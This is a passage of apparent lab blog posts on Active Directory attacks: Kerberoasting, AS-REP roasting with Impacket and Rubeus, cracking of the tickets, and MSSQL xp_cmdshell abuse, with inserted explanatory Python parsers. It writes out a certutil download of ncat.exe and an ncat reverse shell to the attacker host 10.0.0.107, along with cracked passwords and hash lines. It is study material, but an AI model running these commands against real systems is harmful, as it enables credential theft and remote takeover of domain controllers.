      http                               frames:4 bytes:11948
        media                            frames:2 bytes:11564
          tcp.segments                   frames:2 bytes:11564
      tls                                frames:827 bytes:121673
    udp                                  frames:6 bytes:1458
      nbdgm                              frames:6 bytes:1458
        smb                              frames:6 bytes:1458
          mailslot                       frames:6 bytes:1458
            browser                      frames:6 bytes:1458
===================================================================

Looking at the TDS messages, first up the SQL batch packets (tds.type == 1):

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 1'
   20   9.933875   10.0.0.107 → 10.0.0.5     TDS 316 SQL batch
   24  17.281790   10.0.0.107 → 10.0.0.5     TDS 132 SQL batch
   92 973.952996   10.0.0.107 → 10.0.0.5     TDS 170 SQL batch
   96 981.491834   10.0.0.107 → 10.0.0.5     TDS 168 SQL batch
  100 987.357432   10.0.0.107 → 10.0.0.5     TDS 132 SQL batch
  104 996.015944   10.0.0.107 → 10.0.0.5     TDS 138 SQL batch
  ....

Looking at some of the responses (tds.type == 4):

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 4'
    6   0.101021     10.0.0.5 → 10.0.0.107   TDS 91 Response
   15   0.111340     10.0.0.5 → 10.0.0.107   TDS 333 Response[Malformed Packet]
   17   0.129048     10.0.0.5 → 10.0.0.107   TDS 473 Response
   22  10.135335     10.0.0.5 → 10.0.0.107   TDS 666 Response
   26  17.489552     10.0.0.5 → 10.0.0.107   TDS 173 Response
   94 974.032998     10.0.0.5 → 10.0.0.107   TDS 294 Response
  ....

Looking at some of these messages, I see the commands I executed.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y '(tds.type == 1) || (tds.type == 4)' -T fields -e tds.type -e tds.query -E header=y | more
Running as user "root" and group "root". This could be dangerous.
tds.type        tds.query
4
4
4
1       exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFI
GURE;\r\n
4
1       exec master..xp_cmdshell 'whoami'\r\n
1       exec master..xp_cmdshell 'net users'\r\n
1       exec master..xp_cmdshell 'net groups "Domain Admins"'\r\n
1       exec master..xp_cmdshell 'certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe'\r\n
1       exec master..xp_cmdshell 'cmd.exe /c "%temp%\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe"'\r\n
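A parser for the packets tshark decodes above, added as an example that is not part of the original post or of impacket. It also explains why the queries were readable: MS-TDS negotiates encryption in the PRELOGIN exchange, and when the server answers ENCRYPT_OFF (the default when Force Encryption is not set on the SQL Server), TLS protects only the LOGIN7 packet. Impacket's "Encryption required, switching to TLS" refers to that login handshake; afterwards the client drops TLS and the SQL batches travel in cleartext, which is what tds.query shows. The sample stream below is constructed, not taken from the capture: a PRELOGIN reply answering ENCRYPT_OFF, two SQL batches carrying the page's xp_cmdshell statements (the second split across two packets and prefixed with the TDS 7.2 ALL_HEADERS block), and a DONE response.

```python
import struct
from typing import Iterator, List, Optional, Tuple

TDS_SQL_BATCH, TDS_RESPONSE, TDS_PRELOGIN = 0x01, 0x04, 0x12
STATUS_EOM = 0x01            # status bit: last packet of a message
PRELOGIN_ENCRYPTION = 0x01   # PRELOGIN option token
ENCRYPTION = {0: "ENCRYPT_OFF", 1: "ENCRYPT_ON", 2: "ENCRYPT_NOT_SUP", 3: "ENCRYPT_REQ"}


def tds_packets(stream: bytes) -> Iterator[Tuple[int, int, bytes]]:
    """Walk the 8-byte TDS headers: type, status, big-endian length, spid, packet id, window."""
    off = 0
    while off + 8 <= len(stream):
        ptype, status, length, _spid, _pid, _window = struct.unpack(">BBHHBB", stream[off:off + 8])
        if length < 8 or off + length > len(stream):
            raise ValueError(f"bad TDS packet length {length} at offset {off}")
        yield ptype, status, stream[off + 8:off + length]
        off += length


def tds_messages(stream: bytes) -> Iterator[Tuple[int, bytes]]:
    """Reassemble packets into whole messages: payloads concatenate until the EOM bit."""
    buf = b""
    for ptype, status, payload in tds_packets(stream):
        buf += payload
        if status & STATUS_EOM:
            yield ptype, buf
            buf = b""


def sql_batch_text(payload: bytes) -> str:
    """SQL Batch body: optional ALL_HEADERS (TDS 7.2+, 22 bytes holding the transaction
    descriptor header) followed by the statement as UTF-16LE."""
    if len(payload) >= 22:
        total, hlen, htype = struct.unpack("<IIH", payload[:10])
        if total == 22 and hlen == 18 and htype == 0x0002:
            payload = payload[22:]
    return payload.decode("utf-16-le")


def prelogin_encryption(payload: bytes) -> Optional[str]:
    """ENCRYPTION option of a PRELOGIN message (option table of token/offset/length, 0xFF ends)."""
    off = 0
    while off < len(payload) and payload[off] != 0xFF:
        token, pos, length = struct.unpack(">BHH", payload[off:off + 5])
        if token == PRELOGIN_ENCRYPTION and length == 1:
            return ENCRYPTION.get(payload[pos], f"unknown({payload[pos]})")
        off += 5
    return None


def extract_queries(stream: bytes) -> List[str]:
    """Every SQL Batch statement visible in a plaintext stream, as tshark's tds.query shows them."""
    return [sql_batch_text(body).rstrip("\r\n")
            for ptype, body in tds_messages(stream) if ptype == TDS_SQL_BATCH]


def negotiated_encryption(stream: bytes) -> Optional[str]:
    """ENCRYPTION value of the last PRELOGIN in the stream (the server's answer, if captured)."""
    answer = None
    for ptype, body in tds_messages(stream):
        if ptype == TDS_PRELOGIN:
            answer = prelogin_encryption(body)
    return answer


# --- constructed sample traffic (built here, not taken from the page's pcap) -----------------
def build_packet(ptype: int, payload: bytes, status: int = STATUS_EOM, pkt_id: int = 1) -> bytes:
    return struct.pack(">BBHHBB", ptype, status, 8 + len(payload), 0, pkt_id, 0) + payload

# Server PRELOGIN reply: VERSION at offset 11 (6 bytes), ENCRYPTION at offset 17 = ENCRYPT_OFF.
PRELOGIN_REPLY = (struct.pack(">BHH", 0x00, 11, 6) + struct.pack(">BHH", 0x01, 17, 1) + b"\xff"
                  + bytes([0x0d, 0x00, 0x0c, 0x24, 0x00, 0x00]) + b"\x00")
ALL_HEADERS = struct.pack("<IIH", 22, 18, 2) + b"\x00" * 8 + struct.pack("<I", 1)
BATCH1 = "exec master..xp_cmdshell 'whoami'\r\n".encode("utf-16-le")
BATCH2 = ALL_HEADERS + "exec master..xp_cmdshell 'net users'\r\n".encode("utf-16-le")
SAMPLE_STREAM = (build_packet(TDS_PRELOGIN, PRELOGIN_REPLY)
                 + build_packet(TDS_SQL_BATCH, BATCH1)
                 + build_packet(TDS_SQL_BATCH, BATCH2[:30], status=0, pkt_id=1)   # split across
                 + build_packet(TDS_SQL_BATCH, BATCH2[30:], pkt_id=2)             # two packets
                 + build_packet(TDS_RESPONSE, b"\xfd\x00\x00\xc1\x00\x01\x00\x00\x00\x00\x00\x00\x00"))

if __name__ == "__main__":
    print("server said:", negotiated_encryption(SAMPLE_STREAM))
    for q in extract_queries(SAMPLE_STREAM):
        print("SQL batch  :", q)
```

Feed it a TCP stream reassembled from the pcap (tshark -z follow,tcp,raw works) and only the batches that were sent outside TLS will decode; the fix on the server side is Force Encryption = Yes with a trusted certificate, which makes the server answer ENCRYPT_REQ and keeps every batch inside TLS.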

I was able to see the responses also. However, in most cases it does not really make sense to post them here.

Ok, that's it for me and this post.

Beginning Kerberoasting

In Kerberoasting, we leverage the fact that the service ticket returned for an SPN (the enc-part of the TGS-REP) is encrypted with a key derived from the password of the account that owns that SPN. Any authenticated domain user can request such a ticket, so the objective is to request tickets for SPNs that belong to user accounts and crack the service account passwords offline; with RC4_HMAC (etype 23) the key is simply the NT hash of the password, which is why those are the tickets to ask for. Once cracked, the service account's credential can be reused.

First up, using the account from the AS-REP Roasting post which was just completed, querying the domain for SPNs using impacket-GetUserSPNs.

┌──(root💀securitynik)-[~/packets]
└─# impacket-GetUserSPNs securitynik.local/neysa:Testing1 -target-domain SECURITYNIK.LOCAL                              
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

ServicePrincipalName                     Name              MemberOf  PasswordLastSet             LastLogon                   Delegation 
---------------------------------------  ----------------  --------  --------------------------  --------------------------  ----------
cifs/cifs.securitynik.local              cifs-service                2021-11-10 21:33:08.377237  <never>                                
HTTP/http.securitynik.local:80           http-spn                    2021-11-08 21:32:04.867511  <never>                                
HTTP/http                                http-spn                    2021-11-08 21:32:04.867511  <never>                                
HTTP/http.securitynik.local              http-spn                    2021-11-08 21:32:04.867511  <never>                                
HTTP/www.securitynik.local               kerberos-service            2021-10-22 22:34:26.733216  <never>                                
MSSQLSvc/dc-2019.securitynik.local:1433  sql-service                 2021-11-16 04:58:08.706286  2021-11-16 17:30:56.779153 

Requesting service tickets with -request; the output file gets a hash for every SPN listed above, including MSSQLSvc/dc-2019.securitynik.local:1433, the one we are after.

┌──(root💀securitynik)-[~/packets]
└─# impacket-GetUserSPNs securitynik.local/neysa:Testing1 -target-domain SECURITYNIK.LOCAL -request -outputfile GetUserSPNs.hashes

Leveraging Rubeus to grab the tickets instead, from a Windows host.

C:\Tools>Rubeus.exe kerberoast /domain:securitynik.local /outfile:kerberoasting.hashes

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : securitynik.local
[*] Searching path 'LDAP://securitynik.local/DC=securitynik,DC=local' for Kerberoastable users

[*] Total kerberoastable users : 4


[*] SamAccountName         : cifs-service
[*] DistinguishedName      : CN=cifs Service,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : cifs/cifs.securitynik.local
[*] PwdLastSet             : 11/11/2021 2:33:08 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\kerberoasting.hashes


[*] SamAccountName         : http-spn
[*] DistinguishedName      : CN=HTTP SPN,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : HTTP/http.securitynik.local:80
[*] PwdLastSet             : 11/9/2021 2:32:04 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\kerberoasting.hashes


[*] SamAccountName         : kerberos-service
[*] DistinguishedName      : CN=Kerberos Service,CN=Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : HTTP/www.securitynik.local
[*] PwdLastSet             : 10/23/2021 2:34:26 AM
[*] Supported ETypes       : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash written to C:\Tools\kerberoasting.hashes


[*] SamAccountName         : sql-service
[*] DistinguishedName      : CN=SERVICE,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : MSSQLSvc/dc-2019.securitynik.local:1433
[*] PwdLastSet             : 11/16/2021 9:58:08 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\kerberoasting.hashes

[*] Roasted hashes written to : C:\Tools\kerberoasting.hashes

Now that we have the hashes from two different tools, I will take the ones from impacket-GetUserSPNs and feed them to John.

┌──(root💀securitynik)-[~/packets]
└─# john GetUserSPNs.hashes 
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Testing1         (?)
Testing1         (?)
Testing1         (?)
Testing1         (?)
4g 0:00:00:00 DONE 2/3 (2021-11-17 22:18) 50.00g/s 198400p/s 793600c/s 793600C/s Tara1..Smurfy1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

John returned the passwords. The (?) is simply John's placeholder for the login name: the GetUserSPNs file holds bare hashes with no user: prefix, so John has nothing to print there. The account is still identifiable from the *sql-service$...* portion of each hash line, and john --show GetUserSPNs.hashes lists the cracked entries reliably.

Leveraging the password Testing1 with username sql-service against MSSQLSvc/dc-2019.securitynik.local:1433. A Kerberoasted hash belongs to the account that owns the SPN, so the cracked password is usable wherever that account has rights; the obvious first target is the service itself, which in this case is MSSQL on dc-2019. Let's leverage the Impacket suite once again, this time impacket-mssqlclient with Windows authentication, to target the MSSQL service.

┌──(root💀securitynik)-[~]
└─# impacket-mssqlclient securitynik.local/sql-service:Testing1@10.0.0.5 -windows-auth
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC-2019\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC-2019\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 19162) 
[!] Press help for extra shell commands
SQL> 

Now that we are in, let's get some help.

SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL> 

Let's execute enable_xp_cmdshell.

SQL> enable_xp_cmdshell
[*] INFO(DC-2019\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC-2019\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

Both options report "changed from 1 to 1", which tells us xp_cmdshell was already enabled on this instance before we touched it. Let's now run a few commands.

SQL> xp_cmdshell whoami
output                                                                             

--------------------------------------------------------------------------------   

nt service\mssql$sqlexpress                                                        

NULL    

Note who we are: the commands run under the instance's virtual service account, NT SERVICE\MSSQL$SQLEXPRESS, not as sql-service. We could reconfigure xp_cmdshell at all only because the sql-service login holds the server-level rights to do so (sysadmin or serveradmin), and since this SQLEXPRESS instance is installed on the domain controller itself (DC-2019), this is command execution on a DC. Running something more meaningful.

SQL> xp_cmdshell net groups "Domain Admins"
output                                                                             

--------------------------------------------------------------------------------   

Group name     Domain Admins                                                       

Comment        Designated administrators of the domain                             

NULL                                                                               

Members                                                                            

NULL                                                                               

-------------------------------------------------------------------------------    

3202357359SA             admin                    Administrator                    

ANGELINE_WHITAKER        CARMEN_DURAN             DOREEN_MORIN                     

JACKSON_SOSA             LOUISA_MCPHERSON         MISTY_CALHOUN                    

mysqlsvc                                                                           

The command completed successfully.                                                

NULL                                                                               

NULL   

That is all interesting so far. Let's get a ncat shell back to my attacking machine.

First up, let's setup a webserver to host ncat.exe. 

┌──(root💀securitynik)-[~]
└─# cd /home/securitynik/WinTools/

┌──(root💀securitynik)-[~/WinTools]
└─# ls ncat.exe
ncat.exe

┌──(root💀securitynik)-[~/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Using certutil on the target to download ncat.exe.

SQL> xp_cmdshell certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe
output                                                                   
--------------------------------------------------------------------------------   

****  Online  ****                                                                 

CertUtil: -URLCache command completed successfully.                                

NULL                                

Confirming on our attacking machine that the file was successfully downloaded (both GET lines, in the same second, come from that single certutil run).

┌──(root💀securitynik)-[~/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.5 - - [18/Nov/2021 02:29:41] "GET /ncat.exe HTTP/1.1" 200 -
10.0.0.5 - - [18/Nov/2021 02:29:41] "GET /ncat.exe HTTP/1.1" 200 -

Next, set up a ncat listener on our attacking machine that only accepts connections from the compromised host. We also use --ssl so the shell traffic is TLS-wrapped on port 443 and looks like ordinary HTTPS on the wire; note the listener uses a temporary self-signed certificate, which is itself something a defender inspecting TLS metadata can key on.

┌──(root💀securitynik)-[~]
└─# ncat --verbose --listen 443 -4 --ssl  --allow 10.0.0.5
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 881D 3F3D 0CEC 49A2 6A55 E483 902A C0A3 33BF 068F
Ncat: Listening on 0.0.0.0:443

Connecting from the compromised machine.

SQL> xp_cmdshell cmd.exe /c "%temp%\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe"

Looking at the ncat listener, we now have a shell on the domain controller (the banner's build 10.0.17763 is Windows Server 2019), running as the SQL service account.

┌──(root💀securitynik)-[~]
└─# ncat --verbose --listen 443 -4 --ssl  --allow 10.0.0.5
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 881D 3F3D 0CEC 49A2 6A55 E483 902A C0A3 33BF 068F
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.0.0.5.
Ncat: Connection from 10.0.0.5:64218.
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

That is good enough for me. Time to move on. I believe I have improved my knowledge about Kerberoasting.

Beginning AS-REP Roasting with Impacket and Rubeus

In this post, I'm learning about Kerberos and one of its attacks, specifically Authentication Service Response (AS-REP) Roasting. Based on my learning, this attack should be uncommon today: Active Directory requires Kerberos pre-authentication by default, and an account is only exposed if the "Do not require Kerberos preauthentication" option has been deliberately set on it. I am, as always, doing this from the perspective of enhancing my learning. In a previous post, I looked at Kerberoasting.

First up, here is what a normal Active Directory Kerberos authentication looks like in its first four packets. The display filter keeps only AS-REQ, AS-REP and KRB-ERROR messages (msg_type 10, 11 and 30).

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r AD-Authentication.pcapng -Y '(kerberos.msg_type == 10) || (kerberos.msg_type == 11) || (kerberos.msg_type == 30)' 
    8  10.244059   10.0.0.108 → 10.0.0.5     KRB5 311 AS-REQ
    9  10.248297     10.0.0.5 → 10.0.0.108   KRB5 258 KRB Error: KRB5KDC_ERR_PREAUTH_REQUIRED
   16  10.259148   10.0.0.108 → 10.0.0.5     KRB5 391 AS-REQ
   17  10.261119     10.0.0.5 → 10.0.0.108   KRB5 2131 AS-REP
  153  28.562552   10.0.0.108 → 10.0.0.5     KRB5 294 AS-REQ

As shown in packet 8, the client sends an AS-REQ without any pre-authentication data.
In packet 9, the KDC answers with a KRB ERROR, KRB5KDC_ERR_PREAUTH_REQUIRED. The client retries in packet 16, this time carrying pre-authentication (a timestamp encrypted with the key derived from the user's password), and only then does the KDC return the AS-REP in packet 17. Pre-authentication matters because the AS-REP contains a part encrypted with the user's long-term key. Without the requirement, anyone who can reach the KDC can request a Ticket Granting Ticket (TGT) for such a user, receive that encrypted blob without proving anything, and crack the user's password offline. Once you have the cracked password, you can authenticate as that user.

Looking at this in practice, from an Active Directory perspective, the account would have to be deliberately configured with the "Do not require Kerberos preauthentication" option on its Account tab, which sets the DONT_REQ_PREAUTH bit (0x400000) in userAccountControl. That is what has been done to the test account used below.


Let's now leverage a tool from the Impacket suite to see which accounts have pre-authentication disabled. Say we have access to a low-privilege account that is just a member of Domain Users; we can use that account with impacket-GetNPUsers to enumerate users with pre-authentication disabled.

┌──(root💀securitynik)-[~]
└─# impacket-GetNPUsers -dc-ip 10.0.0.5 -ts  securitynik.local/nakia:Testing1
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

Name   MemberOf                                                                       PasswordLastSet             LastLogon                   UAC      
-----  -----------------------------------------------------------------------------  --------------------------  --------------------------  --------
neysa  CN=24-baez64102-admingroup,OU=Groups,OU=SEC,OU=Tier 2,DC=securitynik,DC=local  2021-02-13 17:37:20.397803  2021-11-17 02:18:18.769182  0x410200 
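The UAC column above is the raw userAccountControl value, and decoding it is the quickest confirmation that neysa really is roastable. Below is an added example, not code from this post nor from Impacket or Rubeus, that decodes the flag bits and applies the same selection those tools make (pre-auth not required, account enabled, not a computer object) to a small set of directory entries constructed here. Only neysa's value is taken from the output above; the other entries and the exact LDAP filter string are my own rendering, not a string copied from the tools.

```python
# Added example (not from the original post, Impacket or Rubeus): decode
# userAccountControl and select AS-REP roastable accounts the way
# GetNPUsers-style tools do, against constructed directory entries.

ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000
UAC_FLAGS = {  # userAccountControl bits (the subset that matters for roasting)
    0x0001: "SCRIPT", ACCOUNTDISABLE: "ACCOUNTDISABLE", 0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD", NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT", 0x2000: "SERVER_TRUST_ACCOUNT",
    DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD", 0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION", 0x200000: "USE_DES_KEY_ONLY",
    DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH", 0x800000: "PASSWORD_EXPIRED",
}
BIT_AND = "1.2.840.113556.1.4.803"  # LDAP_MATCHING_RULE_BIT_AND


def decode_uac(value: int) -> list:
    """Names of the set bits, lowest first; bits without a name here are reported, not dropped."""
    names = [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]
    unknown = value & ~sum(UAC_FLAGS)
    return names + ([f"UNKNOWN_0x{unknown:x}"] if unknown else [])


def asrep_roastable_filter() -> str:
    """LDAP filter (my rendering of what GetNPUsers/Rubeus ask the DC for): pre-auth
    not required, account not disabled, not a computer object."""
    return (f"(&(userAccountControl:{BIT_AND}:={DONT_REQ_PREAUTH})"
            f"(!(userAccountControl:{BIT_AND}:={ACCOUNTDISABLE}))"
            f"(!(objectCategory=computer)))")


def is_asrep_roastable(entry: dict) -> bool:
    """The same predicate evaluated locally, i.e. what the bit-AND filter does on the DC."""
    uac = entry["userAccountControl"]
    return bool(uac & DONT_REQ_PREAUTH) and not uac & ACCOUNTDISABLE and entry["objectCategory"] != "computer"


def find_asrep_roastable(entries) -> list:
    return [e["sAMAccountName"] for e in entries if is_asrep_roastable(e)]


# Constructed entries; only neysa's UAC (0x410200) is the value GetNPUsers printed above.
SAMPLE_DIRECTORY = [
    {"sAMAccountName": "neysa", "objectCategory": "person", "userAccountControl": 0x410200},
    {"sAMAccountName": "nakia", "objectCategory": "person", "userAccountControl": 0x10200},
    {"sAMAccountName": "legacy-app", "objectCategory": "person", "userAccountControl": 0x400202},  # pre-auth off, but disabled
    {"sAMAccountName": "DC-2019$", "objectCategory": "computer", "userAccountControl": 0x402000},
]

if __name__ == "__main__":
    print("0x410200 =", " | ".join(decode_uac(0x410200)))
    print(asrep_roastable_filter())
    print("AS-REP roastable:", find_asrep_roastable(SAMPLE_DIRECTORY))
```

0x410200 decodes to NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH, which is exactly the combination an attacker is looking for: no pre-auth, and a password that never expires. Running the filter from the defender's side, on a schedule, finds these accounts before someone else does; clearing the flag on the account (for example Set-ADAccountControl -Identity neysa -DoesNotRequirePreAuth $false) removes the exposure.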

Now that we know a user has the pre-authentication check disabled (the UAC value 0x410200 is NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH), let's request a ticket on that user's behalf. At the same time, I will write the result to a file in John's format and hand that file to John to crack.

┌──(root💀securitynik)-[~]
└─# impacket-GetNPUsers -dc-ip 10.0.0.5 -ts  securitynik.local/nakia:Testing1 -request -format john -outputfile no-preauth.john
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

Name   MemberOf                                                                       PasswordLastSet             LastLogon                   UAC      
-----  -----------------------------------------------------------------------------  --------------------------  --------------------------  --------
neysa  CN=24-baez64102-admingroup,OU=Groups,OU=SEC,OU=Tier 2,DC=securitynik,DC=local  2021-02-13 17:37:20.397803  2021-11-17 02:18:18.769182  0x410200 

When we cat the file, we see ...

┌──(root💀securitynik)-[~]
└─# cat no-preauth.john 
$krb5asrep$neysa@SECURITYNIK.LOCAL:3032d987619dfe5bba1bda3905f2b61e$ccd95cf20d0eff70f1e7fdadd372ca250451335cd5c30960f7f3f8c1dfa545169c73c31ca970b89ca6c5ee06cdaec5cfaea66fbcdaf0fa8e859fdbd791c9c6cbf9a699cfead4d078cdc48d44a971ebea0c76680e14c21028b5c22c9ef27999f77c867d260967b5fee9eb593a0e2fe6f4ca69188f37bdb36241761a7d4699d2a15a35fdeed80213b33ba95613fb349a9868aa178986891619705fbf6820d4e768a0477fa0964cf5608fa90dea33a2f5da58b74a24b967937fcdc436af26f65699c7b3fdc9f298289b0cb91674575df83f97f33076df7f93853462deb375528fa548aab4fda4ac6f04be421b0c6d46a4fd32585bc4948b

We can now provide the file to John with our wordlist. Before doing that, let's look at what the request looked like on the wire.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r no-preauth.pcap -Y '(kerberos.msg_type == 10) || (kerberos.msg_type == 11) || (kerberos.msg_type == 30)' 
    4   0.000441   10.0.0.107 → 10.0.0.5     KRB5 246 AS-REQ
    5   0.002625     10.0.0.5 → 10.0.0.107   KRB5 2376 AS-REP

As seen above, there is no KRB5KDC_ERR_PREAUTH_REQUIRED round trip in this capture, unlike the first one: the single AS-REQ, sent without any pre-authentication data, is answered straight away with the AS-REP, and that AS-REP is what we are about to crack.

Feeding the file to John.

┌──(root💀securitynik)-[~]
└─# john --format=krb5asrep no-preauth.john  --wordlist=~/SEC-504/pass.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates left, minimum 16 needed for performance.
Testing1         ($krb5asrep$neysa@SECURITYNIK.LOCAL)
1g 0:00:00:00 DONE (2021-11-17 03:33) 50.00g/s 250.0p/s 250.0c/s 250.0C/s sans..Testing1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Voila, now we have the user's username and password and can reuse them to gain access. Let's try listing the shares on the domain controller, using smbclient.

┌──(root💀securitynik)-[~/packets]
└─# smbclient --list=10.0.0.5 --user=SECURITYNIK/neysa%Testing1 --max-protocol SMB3 --encrypt

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Leveraging Rubeus for AS-REP Roasting

Now that I understand how to use Impacket for this, time to look at another tool, Rubeus.

C:\Tools>Rubeus.exe asreproast /format:hashcat /dc:dc-2019.securitynik.local /outfile:asrep-roast.hashes

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4


[*] Action: AS-REP roasting

[*] Target Domain          : securitynik.local
[*] Target DC              : dc-2019.securitynik.local

[*] Searching path 'LDAP://dc-2019.securitynik.local/DC=securitynik,DC=local' for AS-REP roastable users
[*] SamAccountName         : neysa
[*] DistinguishedName      : CN=Neysa,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] Using domain controller: dc-2019.securitynik.local (10.0.0.5)
[*] Building AS-REQ (w/o preauth) for: 'securitynik.local\neysa'
[+] AS-REQ w/o preauth successful!
[*] Hash written to C:\Tools\asrep-roast.hashes

[*] Roasted hashes written to : C:\Tools\asrep-roast.hashes

Looking at the contents of the file (the hash body is elided here; the complete line is the one hashcat prints below).

C:\Tools> type asrep-roast.hashes
$krb5asrep$23$neysa@securitynik.local:...

Passing the file to Hashcat (hash type 18200 is Kerberos 5 AS-REP etype 23), we see the password at the end of the line below.

D:\TOOLS\hashcat-6.2.4>hashcat.exe --attack-mode 0 --hash-type 18200 c:\tmp\asrep-roast.hashes ..\pass.txt
hashcat (v6.2.4) starting
...

$krb5asrep$23$neysa@securitynik.local:4f4d040b3dffbeeac4761aa7b5f62c11$39efebf767a19822771789e8aa0286aca05383f57f421d12c7d2f12e285f66e4386a3c102c3b252b120b07de1736b80d27098907d1122c45fa79e2cf48843d16e8f96d2e1f59dfae340610b2f1ef193d634e5954a83cf340cb003ad4eed34b84deeaf1170750c59c8371decb21949a61a97d8fd66153527f7322ab5bd54f7285edaf14bcf6b20c4c6e2480ec859db8c3d784d7bcc8559faf6a2de7c20dad89fd54cf65aabac8ea92ffb4f313691ddf7ea3255486092845c3cbeb2b55b569ba5923aafb15b01379b9c919e43f9f0f321aabffbd16d53f877a650d65eca2b56741c5d17bcc73ddd69a495afc94adf77578629cc9c95750002c:Testing1

As before, now that we have the password, we can authenticate

C:\Tools>runas /user:securitynik\neysa cmd.exe
Enter the password for securitynik\neysa:
Attempting to start cmd.exe as user "securitynik\neysa" ...

Good start. That was a good piece of learning for me, as I look to expand my knowledge on Kerberos.

References: